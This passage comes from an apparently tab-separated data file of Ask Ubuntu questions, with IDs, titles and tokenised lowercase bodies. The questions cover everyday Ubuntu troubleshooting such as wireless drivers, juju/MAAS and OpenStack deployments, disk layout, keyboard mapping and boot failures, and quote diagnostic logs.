file through the terminal , but the output was : interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback sometimes when i try to connect to the ap , the available wireless connections list will become empty . and wo n't display the available connections unless i reboot . lspci output is : > 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) > 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) > 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) > 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) > 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) > 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) > 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) > 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) > 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) > 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) > 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) > 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) > 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) > 00:1d.3 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) > 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) > 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) > 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) > 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) > 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) > 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) > 03:00.0 network controller : realtek semiconductor co. , ltd. rtl8191sevb wireless lan controller ( rev 10 ) sudo ifup wlan0 displays ignoring unknown interface wlan0=wlan0 . output of dmesg | grep wlan is [ 25.570249 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 25.570584 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready other devices connect to the ap just fine . help would be greatly appreciated . how can i fix this ? update ! apparently it is just that specific network that i am unable to connect to . so i 'm assuming the problem is with the router not liking my laptop . i just think it 's a bit strange that other devices do n't have any connectivity problems .
380663	desktop interfacing with existing application indicator - network	we build new drivers for ubuntu for the mobile broadband card that is usb based . once the device is enabled , we want to change the application indicator to indicate the device is available or device is connected . the existing indicator on the desktop works great for existing networking ethernet and wifi . how can our connection manager or driver interface with existing indicator to update it to indicate the device is ready or connected . any help is greatly appreciated .
380664	pci express slot not being recognized	this has happened to me twice now . the first time i had to reinstall xubuntu , and now i would like to avoid that and discover the root of the problem . i have two machines , a and b . both machines have the same set up hardware wise ( same motherboard , gpus and os ) . after unplugging a usb cable in machine a , machine b froze and was inactive . no idea how that is connected . happened twice . /var/log/syslog had no information , but i 've noticed the pci-e x16 slot is n't being recognized now . lspci -v shows : - machine a : 00:00.0 host bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( external gfx0 port b ) ( rev 02 ) subsystem : asrock incorporation device 5a14 flags : fast devsel capabilities : < access denied > 00:02.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( pci express gpp port b ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : fea00000-feafffff prefetchable memory behind bridge : 00000000c0000000-00000000cfffffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp 00:03.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( pci express gpp port c ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 0000d000-0000dfff memory behind bridge : fe900000-fe9fffff prefetchable memory behind bridge : 00000000b0000000-00000000bfffffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp - machine b : 00:00.0 host bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( external gfx0 port b ) ( rev 02 ) subsystem : asrock incorporation device 5a14 flags : fast devsel capabilities : < access denied > 00:03.0 pci bridge : advanced micro devices [ amd ] nee ati rd890 pci to pci bridge ( pci express gpp port c ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : fea00000-feafffff prefetchable memory behind bridge : 00000000c0000000-00000000cfffffff capabilities : < access denied > kernel driver in use : pcieport kernel modules : shpchp notice the lack of 00:02.0 in machine b , but the host bridge is active for port b ( just not a gpp as well. ) . i 've confirmed that the dir /sys/devices/pci0000:00/0000:00:02.0 is missing in machine b but exist on machine a. i 've been at this for 4 hours now . what can i do for save myself ?
380665	bash terminal . not working no command working	i am working on ubuntu 13.04 and my terminal is not working.when i open terminal bash : ls : no such file or directory comes on terminal and no command is working . if i type anything it displays bash : sudo : no such file or directory
380667	where can i find log of system program problem ?	every time i turn on my computer , i will meet many dialogues saying : but after i click report problem , it disappears and nothing more happens . where can i find log for those problem ?
380669	ubuntuone using bash script to copy files	i am new to ubuntuone . i need to copy / backup a folder , using bash script . is it possible ? i did not find where are the local copies of the files , saved by ubuntuone . thanks .
380670	layout switching while button is pressed in 13.10	in saucy they added new utility to switch layouts , and i ca n't find there or in dconf editor an option to switch languages while button is pressed . is there any config file to add this option in it ?
380673	laptop monitor plus two external monitors	is it possible to have all three screens active . my external monitors are connected throught vga and hdmi . i am using ubuntu 13.10 laptop dell inspiron 7720 gpu : intel hd graphics 4000
380674	13.10 short cut keys and mouse	i recently bought a asus vivobook touch screen / win8 and now dual boot with grub & 13.10 i completely new to linux and the whole touch screen environment , so i do n't know what 's what and do n't have the words to explain what 's going on or not , but some thing definitely is n't right in linux land ... i fumbled my way thru the dual boot process , using 13.4 screen caps and as it would seem , grub seems happy letting me go either way and a few more options . i 'm a cad guy , so keyboard and short cuts using a mouse are pretty straight forward , it 's the new values that i 'm getting used to . now add the touch screen and i 'm trippin ' all over myself ... anyways , i 'm loosing the alt+tab for flipping thru windows/programs , ( took a while to sort flippin ' doc windows of the same program ) in addition to other short cuts i coulda swore were just there ... i also some how manage to get a chrome tab stuck to the end of the pointer , be it mouse/pad/screen , i just ca n't seem to shake it loose and fight to close chrome before i can do anything ... i think it 's happened with other tab 'd apps too , but chrome more then twice , while i was surfing around . i 'm also getting error notes , linux/ubuntu , piled on top of each other , in increasing numbers , in the last day . i 've checked the details , usually see something that makes some kinda sense , but it does n't help me . now these things are increasing and are kinda hard to get rid of the all them and when i do , i seem to be able to continue on my way ... i should paid more attention the specific error ( s ) , but i think it 's the same thing continuing to try and getting the same error ( s ) ... i dunno , i do n't get it , but it do n't seem right 多 but it 's hell of a lot nicer then windows problems , so far ... : p any help ?
380676	disk setup with a small ssd and a large hdd	i have a notebook on which i on want to install ubuntu 13.10 in dual boot with window 8.1 . it has an 500gb hdd , and a 24gb ssd used as cache in windows . in windows i disabled expresscache and unformatted the ssd . now i am looking for reasonable way to partition my drives while installing ubuntu to make use of the ssd . i looked on the internet , and there are different setups people use . using flashcache/bcache . this is the same as expresscache in windows . advantages : everything is cached and is cached automatically . disadvantages : requires advanced setup ; also , i'ma afraid something can break when linux kernel is upgraded . putting / on ssd and /home in hdd . advantages : very simple and robust setup . disadvantages : i think i would put the /home directory on the ssd , but for most directories , especially the ones with large files , i would simply have a symbolic link to whatever contains the files . this way , you can keep your settings , and the browser cache , etc on the ssd , but put the pictures , sounds , documents , etc on whatever disk you want , which can easily be changed by changing the links . putting / and /home on ssd , while making symbolic links for downloads , videos , .wine , etc . to hdd . advantages : maximum cache . disadavantages : micromanagement - to many things to fiddle with . where to put swap partition ? http : //askubuntu.com/a/289202/7064 also , if you plan for a swap partition , put in on the ssd . http : //askubuntu.com/a/62161/7064 do not put swap on the ssd . put it on the hdd . http : //askubuntu.com/a/20154/7064 i would n't care too much about putting a swap-partition on a ssd . the swap is , like said before , only used if there 's no ram left . but then there are `` few '' sequential writes and `` many '' random reads . that 's exactly a form of usage ssds excel in . what storage setup are you using ? what are other advantages/disadvantages in each of the setups ? also , though people say that modern ssds are good with a lot of writes , i still do n't trust them , especially as a read from my comments on my notebook that the ssd in it breakes quite often .
380678	powerpc no os how to install with usb	i have a powerpc g3 that does not have an os on it . i dont have a disk , but i do have an usb . i plug it in but i am not getting anything to install
380679	how to get id 148f:5370 ralink technology , corp. rt5370 wireless adapter running on ubuntu 12.04	i 've got issues getting id 148f:5370 ralink technology , corp. rt5370 wireless adapter to run ob an ubuntu 12.04 box . i 've downloaded latest sources from http : //www.mediatek.com/_en/07_downloads/dl.php and compiled them with activated support for : has_wpa_supplicant=y has_native_wpa_supplicant_support=y make and make install worked without any issues . also i added to blacklisted list : blacklist rt2800usb blacklist rt2870sta when inserting the device i 'm getting [ 1625.120102 ] usb 1-1.2 : new high-speed usb device number 7 using ehci_hcd [ 1625.232103 ] [ 1625.232106 ] [ 1625.232107 ] === pad = ffffc900228ea000 , size = 598360 === [ 1625.232109 ] [ 1625.232241 ] < -- rtmpallocadapterblock , status=0 [ 1625.232419 ] efuse size=0x2d [ 2d0-2fc ] [ 1625.232776 ] nvm is efuse [ 1625.249500 ] addrconf ( netdev_up ) : ra0 : link is not ready syslog is extending this a bit : nov 19 17:27:03 betschwa kernel : [ 1625.120102 ] usb 1-1.2 : new high-speed usb device number 7 using ehci_hcd nov 19 17:27:03 betschwa kernel : [ 1625.232103 ] nov 19 17:27:03 betschwa kernel : [ 1625.232106 ] nov 19 17:27:03 betschwa kernel : [ 1625.232107 ] === pad = ffffc900228ea000 , size = 598360 === nov 19 17:27:03 betschwa kernel : [ 1625.232109 ] nov 19 17:27:03 betschwa kernel : [ 1625.232241 ] < -- rtmpallocadapterblock , status=0 nov 19 17:27:03 betschwa mtp-probe : checking bus 1 , device 7 : `` /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2 '' nov 19 17:27:03 betschwa kernel : [ 1625.232419 ] efuse size=0x2d [ 2d0-2fc ] nov 19 17:27:03 betschwa kernel : [ 1625.232776 ] nvm is efuse nov 19 17:27:03 betschwa mtp-probe : bus : 1 , device : 7 was not an mtp device nov 19 17:27:03 betschwa networkmanager [ 1092 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/net/ra0 , iface : ra0 ) nov 19 17:27:03 betschwa networkmanager [ 1092 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/net/ra0 , iface : ra0 ) : no ifupdown configuration found . nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < warn > failed to allocate link cache : ( -10 ) operation not supported nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < info > ( ra0 ) : driver does not support ssid scans ( scan_capa 0x00 ) . nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < info > ( ra0 ) : using wext for wifi device control nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < error > [ 1384878423.166788 ] [ nm-device-wifi.c:2591 ] real_update_permanent_hw_address ( ) : ( ra0 ) : unable to read permanent mac address ( error 0 ) nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < info > ( ra0 ) : new 802.11 wifi device ( driver : 'usb ' ifindex : 7 ) nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < info > ( ra0 ) : exported as /org/freedesktop/networkmanager/devices/6 nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < info > ( ra0 ) : now managed nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < info > ( ra0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < info > ( ra0 ) : bringing up device . nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < info > ( ra0 ) : deactivating device ( reason 'managed ' ) [ 2 ] nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < warn > ( ra0 ) : error 100 getting card mode nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < error > [ 1384878423.168059 ] [ wifi-utils-wext.c:155 ] wifi_wext_set_mode ( ) : ( ra0 ) : error setting mode 2 nov 19 17:27:03 betschwa kernel : [ 1625.249500 ] addrconf ( netdev_up ) : ra0 : link is not ready nov 19 17:27:03 betschwa networkmanager [ 1092 ] : < warn > ( ra0 ) : error 100 getting card mode what else am i missing ? is there maybe any deb for ubuntu anywhere available ?
380684	recover from improper cryptsetup device removal	using xubuntu 10.04 ( yes , old ) , i insert an usb disk with cryptsetup volume in it . the os asks for passphrase and i get access as usual . then i umount the mounted volume and remove the usb disk . now if i put it back , i 'm not being asked the passphrase , and i ca n't access it . if i reboot , things start working again , but i have not found a way to recover without a reboot . i did try the obvious commands such as cryptsetup remove devicename ( where devicename is file name under /dev/mapper ) , but no luck . so , how to `` reset '' the situation , so that passphrase is asked again when i insert the usb disk , without rebooting ? note : so this is not about recovering from corrupted file system or other data loss , just resetting the state of the os or the crypto system .
380685	ubuntu 13:04 loses colour profile after hibernation	i installed latest driver from amd to my radeon 5970 and after that i need to load the colour profile manually every time my computer boots up from hibernation . how to do ?
380686	saving underscan settings in nvidia	it seems to be a common issue with ati cards , but i ca n't find much about it for the nvidia cards . each time i reboot the underscan settings seem to fail and the screen will 'pan ' a little bit to the right and bottom . i have to go to the settings in nvidia x server , change them , apply , change them back amd apply again each time i boot . really want to find a fix for this one . cheers .
380689	access api for unity topbar ?	is there any way to access ubuntu unity topbar using node.js ? i just want to make a web app and need some way to make a indicator for the web app .
380693	read mac 's hfs+ read only on linux	the problem that i have external harddisk mypassport 1tb , i formatted it using it 's utilites application , and copied big data ( ~300gb ) , when i use it in window ( after many tries and converted it from gpt ) it gives error that it need to be formatted , and in linux it is mounted and seen but many files ca n't be copied ( permission error ) after seaching , i found that the user owner of files is ( 99 ) , and the result of sudo blkid command is type= '' hfsplus '' i am trying solving this problem 10 days ago , and it is a very important data , i ca n't loss . how can i resolve this ?
380695	installing and start using juju in ubuntu	i am new ubuntu user . i am looking forward to install juju core in ubuntu and learn how to use it . my environment : installed a vm using oracle virtual box . ubuntu 13.10 how do i install and configure juju core in my environment . also if someone can help me with some links on how can we establish connectivity between juju core and client .
380698	password is incorrect - when tried to login into ubuntu 13.04	i recently installed ubuntu 13.04 with dual boot to win 7 without any issue . the login screen came up on ubuntu with two accounts ( guest & myname ) . i was able to login as guest but not through my name it said `` invalid password please try again '' . i have tried all possible passwords that i know off . could anyone please suggest . thanks
380704	deja-dup backup nas problem	i 'm trying to make a backup with deja-dup via lan to my nas using `` windows share '' ( samba ) . it worked the last days but since today i got the following error : dbus error org.freedesktop.dbus.error.noreply : did not receive a reply . possible causes include : the remote application did not send a reply , the message bus security policy blocked the reply , the reply timeout expired , or the network connection was broken . it 's also not possible for me to open the share in nautilus , it looks like it has to many files in there . how can i fix it ? how can it work again ?
380708	tun/tap ubuntu 12.04 error	i need to enable tun/tap on my ubuntu 32-bit operating system . here is screenhot of the problem :
380709	unable to start lxc container	i have installed lxc in ubuntu server , every thing was working fine . today i have updated lxc from version 0.7.5 to version 1.0.0.alpha2 . after i update lxc , i am unable to start lxc containers . lxc-ls : containerone containertwo containerthree . i have created these containers in version 0.7.5 . after update to 1.0.0.alpha2 i try to start container as lxc-start -n containerone result : < 4 > init : ureadahead main process ( 7 ) terminated with status 5 . . . mountall : mount /run [ 34 ] terminated with status 32 mountall : filesystem could not be mounted : /run what is the error ? how can i solve this problem ? i have restarted server but no luck . additional info : i have mounted lxc lib and cache in different file system when i installed lxc for first time . entry in fstab file : /home/lxclib /var/lib/lxc none defaults , bind 0 0 /home/lxccache /var/cache/lxc none defaults , bind 0 0 edit : i did update lxc while all the three containers started , is this the problem ?
380711	can not ping to ubuntu 13.04 server	i am using ubuntu 13.04 server and its internal static lan ip is 172.16.x.x . and i am trying to access ( mostly using ssh ) it from another clients whose ip are 172.28.x.x . suddenly , few days back i am not been able to access it from the clients . whereas when i am entering through another server whose ip is 172.16.x.x to my server , i can successfully log in . if anyone have any idea then please let me know how can i access the server from my clients ? is there any routing problem ? or the problem within the configuration of my server set up ?
380712	how to create an audio iso file from wav files ?	i use 13.04 with unity . i would like to create an audio iso file from my wav files . i tried many `` solutions '' , but i only could create bin/cue by brasero . is there any solution for this situation without i should burn a physical cd and rip it to iso ? thx !
380713	metapackage vs. package / emacs	i already have emacs 23 package . would getting the metapackage make it easy to get plugins like slime or ensime ? what secifically would be better if i had the metapackage ? should i get it ? do i have to uninstall emacs 23 package before installing the metapackage ?
380715	lubuntu . ca n't play vimeo	i now have lubuntu 13.04 with chromium browser installed on my acer aspire one d255 netbook . i ca n't play vimeo vids . i 've downloaded the flash nonfree package thinking that 'll sort it but no luck . i get the message `` this video ca n't be played with your current setup '' . i 'm wondering if this is an issue with chromium ? help please . this has now been resolved by getting lubuntu restricted extras .
380716	juju status machines 1 2 3 instance-id : pending forever	i am building a maas environment with 4 physical machines . 1 is running maas and ubuntu 13.04 3 are maas nodes running ubuntu 12.10 ( machine 0,1,2 ) my problem is that after juju bootstrap only machine 0 ever get a running agent . all 3 nodes were setup on the same day . maas web ui shows all nodes as `` allocated to root '' . you can ssh directly to machine 1 & 2 and there does not appear to be any trace of juju being installed on them . you can not juju ssh 1 or juju ssh 2 here is juju status : system @ ubuntu1 : ~ $ juju status 2013-11-22 23:19:40,553 info connecting to environment ... 2013-11-22 23:19:41,137 info connected to environment . machines : 0 : agent-state : running dns-name : 3ycae.ceph instance-id : /maas/api/1.0/nodes/node-d4ef6adc-522b-11e3-abf4-deadbeeefb1a/ instance-state : unknown 1 : instance-id : pending 2 : instance-id : pending 3 : instance-id : pending services : { } 2013-11-22 23:19:41,200 info 'status ' command finished successfully i have tried juju destroy-environment , the dns is working correctly they can all ping each other by name . i have the firewall turned off on the maas host . i have tried deploying services but that does n't help . system @ ubuntu1 : ~ $ juju status 2013-11-22 23:23:54,514 info connecting to environment ... 2013-11-22 23:23:55,082 info connected to environment . machines : 0 : agent-state : running dns-name : 3ycae.ceph instance-id : /maas/api/1.0/nodes/node-d4ef6adc-522b-11e3-abf4-deadbeeefb1a/ instance-state : unknown 1 : instance-id : pending 2 : instance-id : pending 3 : instance-id : pending services : munin : charm : cs : precise/munin-3 relations : { } units : munin/4 : agent-state : pending machine : 1 public-address : null munin/5 : agent-state : pending machine : 2 public-address : null munin/6 : agent-state : pending machine : 3 public-address : null 2013-11-22 23:23:55,221 info 'status ' command finished successfully if i run juju -v ssh 1 i get this output , perhaps this will give you a clue . system @ ubuntu1 : ~ $ juju -v ssh 1 2013-11-22 23:28:16,858 debug initializing juju ssh runtime 2013-11-22 23:28:16,862 info connecting to environment ... 2013-11-22 23:28:16,909 debug connecting to environment using 3ycae.ceph ... 2013-11-22 23:28:16,909 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' 3ycae.ceph '' remote_port= '' 2181 '' local_port= '' 39791 '' . 2013-11-22 23:28:17,416:6182 ( 0x7fa5364bd700 ) : zoo_info @ log_env @ 658 : client environment : zookeeper.version=zookeeper c client 3.3.5 2013-11-22 23:28:17,416:6182 ( 0x7fa5364bd700 ) : zoo_info @ log_env @ 662 : client environment : host.name=ubuntu1 2013-11-22 23:28:17,416:6182 ( 0x7fa5364bd700 ) : zoo_info @ log_env @ 669 : client environment : os.name=linux 2013-11-22 23:28:17,416:6182 ( 0x7fa5364bd700 ) : zoo_info @ log_env @ 670 : client environment : os.arch=3.8.0-29-generic 2013-11-22 23:28:17,416:6182 ( 0x7fa5364bd700 ) : zoo_info @ log_env @ 671 : client environment : os.version= # 42~precise1-ubuntu smp wed aug 14 16:19:23 utc 2013 2013-11-22 23:28:17,417:6182 ( 0x7fa5364bd700 ) : zoo_info @ log_env @ 679 : client environment : user.name=system 2013-11-22 23:28:17,417:6182 ( 0x7fa5364bd700 ) : zoo_info @ log_env @ 687 : client environment : user.home=/home/system 2013-11-22 23:28:17,417:6182 ( 0x7fa5364bd700 ) : zoo_info @ log_env @ 699 : client environment : user.dir=/home/system 2013-11-22 23:28:17,417:6182 ( 0x7fa5364bd700 ) : zoo_info @ zookeeper_init @ 727 : initiating client connection , host=localhost:39791 sessiontimeout=10000 watcher=0x7fa5344886b0 sessionid=0 sessionpasswd= < null > context=0x25c4150 flags=0 2013-11-22 23:28:17,418:6182 ( 0x7fa531263700 ) : zoo_info @ check_events @ 1585 : initiated connection to server [ 127.0.0.1:39791 ] 2013-11-22 23:28:17,427:6182 ( 0x7fa531263700 ) : zoo_info @ check_events @ 1632 : session establishment complete on server [ 127.0.0.1:39791 ] , sessionid=0x1427dc75f5d003a , negotiated timeout=10000 2013-11-22 23:28:17,431 debug environment is initialized . 2013-11-22 23:28:17,431 info connected to environment . 2013-11-22 23:28:17,432 debug fetching machine address using juju machine id . traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1039 , in _inlinecallbacks result = g.send ( result ) file `` /usr/lib/python2.7/dist-packages/juju/control/utils.py '' , line 56 , in get_ip_address_for_machine provider_machine = yield provider.get_machine ( instance_id ) file `` /usr/lib/python2.7/dist-packages/juju/providers/common/base.py '' , line 178 , in get_machine d = self.get_machines ( [ instance_id ] ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1181 , in unwindgenerator return _inlinecallbacks ( none , gen , deferred ( ) ) -- - < exception caught here > -- - file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1039 , in _inlinecallbacks result = g.send ( result ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/provider.py '' , line 91 , in get_machines instances = yield self.maas_client.get_nodes ( instance_ids ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/maas.py '' , line 96 , in get_nodes for resource_uri in resource_uris ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/maas.py '' , line 96 , in < genexpr > for resource_uri in resource_uris ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/maas.py '' , line 35 , in extract_system_id match = _re_resource_uri.search ( resource_uri ) exceptions.typeerror : expected string or buffer 2013-11-22 23:28:17,457 error traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1039 , in _inlinecallbacks result = g.send ( result ) file `` /usr/lib/python2.7/dist-packages/juju/control/utils.py '' , line 56 , in get_ip_address_for_machine provider_machine = yield provider.get_machine ( instance_id ) file `` /usr/lib/python2.7/dist-packages/juju/providers/common/base.py '' , line 178 , in get_machine d = self.get_machines ( [ instance_id ] ) file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1181 , in unwindgenerator return _inlinecallbacks ( none , gen , deferred ( ) ) -- - < exception caught here > -- - file `` /usr/lib/python2.7/dist-packages/twisted/internet/defer.py '' , line 1039 , in _inlinecallbacks result = g.send ( result ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/provider.py '' , line 91 , in get_machines instances = yield self.maas_client.get_nodes ( instance_ids ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/maas.py '' , line 96 , in get_nodes for resource_uri in resource_uris ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/maas.py '' , line 96 , in < genexpr > for resource_uri in resource_uris ) file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/maas.py '' , line 35 , in extract_system_id match = _re_resource_uri.search ( resource_uri ) exceptions.typeerror : expected string or buffer expected string or buffer 2013-11-22 23:28:17,459 error expected string or buffer system @ ubuntu1 : ~ $ how can i resolve this ?
380718	openstack havana with juju/maas : no quantum api server listening for requests	i am using juju with maas on a 12.04 in order to deploy openstack havana . in order to do this i have successfully deployed the recommended charms with the openstack-origin set to `` cloud : precise-havana '' while forcing some of them to be deployed on the same node : on the `` cloud-controller '' node : openstack-dashboard cinder glance keystone nova-cloud-controller ( with network-manager set to `` neutron '' ) quantum-gateway mysql rabbitmq-server on a `` compute '' node : nova-compute relations are established following the installation guide . my issue now : the horizon web interface is crashing right after logging in with this exception value `` connection to neutron failed : maximum attempts reached '' . actually , even if the keystone cli client is telling me that there is an endpoint for quantum/neutron ( on port 9696 ) it seems there is no quantum/neutron server listening on 9696 to manage this api : '' netstat -na | grep listen '' is not showing any 9696 open port on my `` cloud-controller '' node . cli client is not able to connect to neutron too . removing the `` quantum-gateway '' from this node and deploying it on another one is not helping , in fact i saw that the endpoint for the quantum api in keystone has n't changed to the new node ip : the endpoint is still pointing to the `` cloud-controller '' node . finally , i see no `` quantum-server '' or `` neutron-server '' package installed neither on my `` cloud-controller '' node or on the node i have moved the `` quantum-gateway '' charm . how can i get my quantum/neutron service working ?
380724	usb headset conflicts with mouse	well , i 'm trying to use a plantronics headset , in ubuntu 13.10 , the sound works fine , but the mouse start with a crazy behavior , missing clicks and things like that , ( seems that the mouse can operate just in the first program that i click . ) if i remove the headset the mouse get normal . i do n't know what is that , for me , it 's do n't make any sense . if anyone have some idea , please let me know . thanks =d .
380727	choosing default boot sequence	i choose working version from grub menu and run boot repair which says : http : //paste.ubuntu.com/6457971/ i want to know how can i make it my default boot sequence .
380730	setting xmodmap on login in lubuntu 13.10	i installed lubuntu 13.10 , and i 'm observing a different behavior of xmodmap than in previous versions . i have a ~/.xmodmap file that maps the caps lock key to the ctrl key . executing modmap ~/.xmodmap works as expected . however , the .xmodmap file is ignored during the login process . in another machine with lubuntu 13.04 the .xmodmap is read automatically during the login process . i tried adding a line to /home/ajw/.config/lxsession/lubuntu/autostart that call a script that set the xmodmap , but this is ignored . according to this link , somewhere during the login process the xmodmap setting is undo by a call to setxkbmap . any idea about how to set xmodmap automatically in lubuntu 13.10 ?
380734	mounting/accessing other encrypted home directories at boot on triple-boot system	i am looking to triple boot , windows 8 ( for legacy stuff ) , ubuntu 13.10 , and a 2nd , light linux distro . older computer , vm for 2nd distro wo n't cut it ) i want to use encryption but can get by with a minimum of encrypted home directories . i plan for as simple a partition scheme as possible and would prefer to avoid lvm if possible . something like : sda1 = > ntfs win 8 sda2 = > / for ubuntu sda3 = > / for other linux distro sda4 = > swap ( encrypted ) 1 . can two installs share an encrypted swap ? 2 . or will i need 2 swap partitions ? sda5 = > /home = > /home/ubuntu/user ( s ) + /home/distro2/user ( s ) ( individually encrypted ) sda6 = > ntfs data-share-partition 3 . my main question is , how can i set it up so that booting into either linux and logging in will decrypt not only that user 's home directory but the other one ? 4 . or at least prompt for a passphrase to decrypt the other one ? 5 . i would rather not mess with whole disk encryption be cause i already have most of these partitions set and i do n't really want to wipe everything and start over . can i simplify this by setting the encryptfs passphrases to match and some ftsab magic ?
380737	boot problem . deleted a drive accidentally ( not the windows partion ) . but now both windows and ubuntu wont boot	i have win7 and ubuntu . i tried expanding a drive ( not the drive with windows ) and was successful in windows but that drive could not be accessed in ubuntu . it reported a not compatible drive format error . in a vain effort to get it working up again i deleted that partition in ubuntu using disk management . now after rebooting it says that i have no operating system on my pc . what should i do ? and can i get the data on the drive that i deleted ? suggestions please . thank you .
380740	problem with accented letters on firefox and chrome	i have ubuntu 13.04 . it 's been some time that in different web pages i ca n't see the accented letters like àèìòù correctly displayed . but not everywhere . some page work just fine . but today , for example , facebook changed the chat layout so now in the new chat balloons the characters are displayed wrong , while if i go to the message page i can see them correctly . in the firefox preferences i have set unicode ( utf-8 ) . any idea how to solve this ? i 've already looked at other similar questions , but nothing helped
380741	how to auto restart a crashed app ?	im tired that everytime my dock ( i use docky ) crash i have to manual reopen it . there is a way for auto restart docky everytime it crash ? i mean something that can auto reopen the app when it crash ... ps i 'm a newby non english on xubuntu
380743	how to setup portforwarding	i have the following setup . local -- server a -- server b i need to scp , ssh from local to b . what i do now is i scp/ssh to a and then from a to b.i would like to know how to setup portforwarding , so i can do ssh to a specific port and i driectly reach server b
380746	changing ubuntu server 's language to english	i just got myself a dedicated server that 's running ubuntu 13.10 64bit and it is in french language ( console.online.net ) . is there any way to install an english language package ? i 'm a linux newbie and the fact that its in french does n't help sorry , the comments did n't work for me so i just edit here : i get : lecture des listes de paquets ... fait construction de l'arbre des dăšpendances lecture des informations d'ăštat ... fait e : impossible de trouver le paquet language-support-en when i type sudo apt-get install language-support-en somehow it does n't just work : (
380748	ubuntu 12.04 wont boot on sony vaio vpceh	installed a brand new tosh 1tb hard disk on my sony vaio vpceh laptop and tried ubuntu 12.04 lts livecd with no problems , so i installed it on the hard disk but when i turn on the pc all i get is a flashing cursor at the top left of the screen , nothing else anyone offer any solution ?
